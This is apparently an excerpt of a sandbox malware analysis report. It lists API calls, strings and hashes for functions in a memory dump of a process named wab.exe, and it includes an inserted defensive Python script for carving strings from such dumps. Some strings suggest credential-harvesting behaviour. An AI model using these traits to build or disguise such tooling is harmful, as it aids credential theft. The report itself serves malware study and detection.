                                                                                                                                                                                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID: -journal$-wal
                                                                                                                                                                                                          • API String ID: 438689982-2894717839
                                                                                                                                                                                                          • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                                                                                                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3975816621-0
                                                                                                                                                                                                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                          • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                          • API String ID: 1214746602-2708368587
                                                                                                                                                                                                          • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                                          • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2047574939-0
                                                                                                                                                                                                          • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4218492932-0
                                                                                                                                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A90C
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A988
                                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044AA19
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                          • API String ID: 3510742995-2446657581
                                                                                                                                                                                                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A25
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
• memset.MSVCRT ref: 00405ABB
• SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
• SetFocus.USER32(?), ref: 00405B76
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
• Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
• Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
• Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
• Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: _snwprintfwcscat
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 384018552-4153097237
• Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
• Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
• Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
• Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetwcschr
• String ID: 0$6
• API String ID: 2029023288-3849865405
• Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
• Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
• Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
• Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
• memset.MSVCRT ref: 00405455
• memset.MSVCRT ref: 0040546C
• memset.MSVCRT ref: 00405483
• memcpy.MSVCRT ref: 00405498
• memcpy.MSVCRT ref: 004054AD
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$memcpy$ErrorLast
• String ID: 6$\
• API String ID: 404372293-1284684873
• Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
• Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
• Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
• Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
Uniqueness
Uniqueness Score: -1.00%

APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
• wcscpy.MSVCRT ref: 0040A0D9
• wcscat.MSVCRT ref: 0040A0E6
• wcscat.MSVCRT ref: 0040A0F5
• wcscpy.MSVCRT ref: 0040A107
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
• API String ID: 1331804452-0
• Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
• Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
• Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
• Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• API String ID: 2012295524-4050573280
• Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
• Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
• Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
• Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
Uniqueness
Uniqueness Score: -1.00%
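The String ID fields of the _snwprintf/wcscat record (the HTML table fragments) and of the GetProcAddress record (advapi32.dll) above are the kind of artifact a responder would carve for in the dump named in the Memory Dump Source field. The following Python helper is an added example and is not part of this Joe Sandbox report: it searches a raw dump for those strings in both ASCII and UTF-16LE (the recorded functions are the wide-char variants, so the strings are likely to sit in memory as UTF-16LE and a plain ASCII grep would miss them), maps each hit to a virtual address using the 0x400000 base stated in the record, and reports how many of the markers were seen. The sample dump bytes are constructed inline; the marker list, the offsets and the coverage score are illustration-only assumptions, not values taken from the report.

```python
"""Carve report-format and DLL-name strings out of a raw memory dump.

Added example for triaging a Joe Sandbox .sdmp; not part of the report.
"""
from dataclasses import dataclass
from typing import List

# Strings copied from the String ID fields of the two records above.
MARKERS = [
    "<td bgcolor=#%s nowrap>%s",
    "<td bgcolor=#%s>%s",
    "<tr>",
    "&nbsp;",
    "advapi32.dll",
]

# Assumption: image base taken from "Offset: 00400000" in the record.
IMAGE_BASE = 0x400000


@dataclass(frozen=True)
class Hit:
    marker: str
    encoding: str   # "ascii" or "utf-16le"
    offset: int     # byte offset inside the dump
    base: int = IMAGE_BASE

    @property
    def va(self) -> int:
        """Virtual address, usable to cross-reference the xrefs in the records."""
        return self.base + self.offset


def find_markers(dump: bytes, base: int = IMAGE_BASE) -> List[Hit]:
    """Return every ASCII or UTF-16LE occurrence of MARKERS, ordered by offset."""
    hits: List[Hit] = []
    for marker in MARKERS:
        for enc in ("ascii", "utf-16le"):
            needle = marker.encode(enc)
            start = 0
            while (idx := dump.find(needle, start)) != -1:
                hits.append(Hit(marker, enc, idx, base))
                start = idx + 1
    return sorted(hits, key=lambda h: h.offset)


def coverage(hits: List[Hit]) -> float:
    """Fraction of distinct markers present (assumed triage score, 0.0-1.0)."""
    return len({h.marker for h in hits}) / len(MARKERS)


def build_sample_dump() -> bytes:
    """Constructed stand-in for the .sdmp: zero padding with a few markers embedded."""
    buf = bytearray(b"\x00" * 0x100)
    buf += "<td bgcolor=#%s nowrap>%s".encode("utf-16le")   # wide, at offset 0x100
    buf += b"\x00" * 0x40
    buf += b"advapi32.dll\x00"                              # narrow, at offset 0x172
    buf += b"\x00" * 0x20
    buf += "advapi32.dll".encode("utf-16le")                # wide, at offset 0x19F
    buf += b"\x00" * 0x10
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample_dump()
    found = find_markers(sample)
    for h in found:
        print(f"{h.va:#010x} {h.encoding:<9} {h.marker!r}")
    print(f"coverage: {coverage(found):.2f}")
```

Run it against a real dump by replacing `build_sample_dump()` with the file's bytes; a wide-only search would still have missed the narrow `advapi32.dll`, which is why both encodings are tried.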

Strings
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
• <?xml version="1.0" ?>, xrefs: 0041007C
• <%s>, xrefs: 004100A6
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3473751417-2880344631
• Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
• Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
• Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
• Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2350177629-0
                                                                                                                                                                                                          • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                          • API String ID: 2221118986-1606337402
                                                                                                                                                                                                          • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                          • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
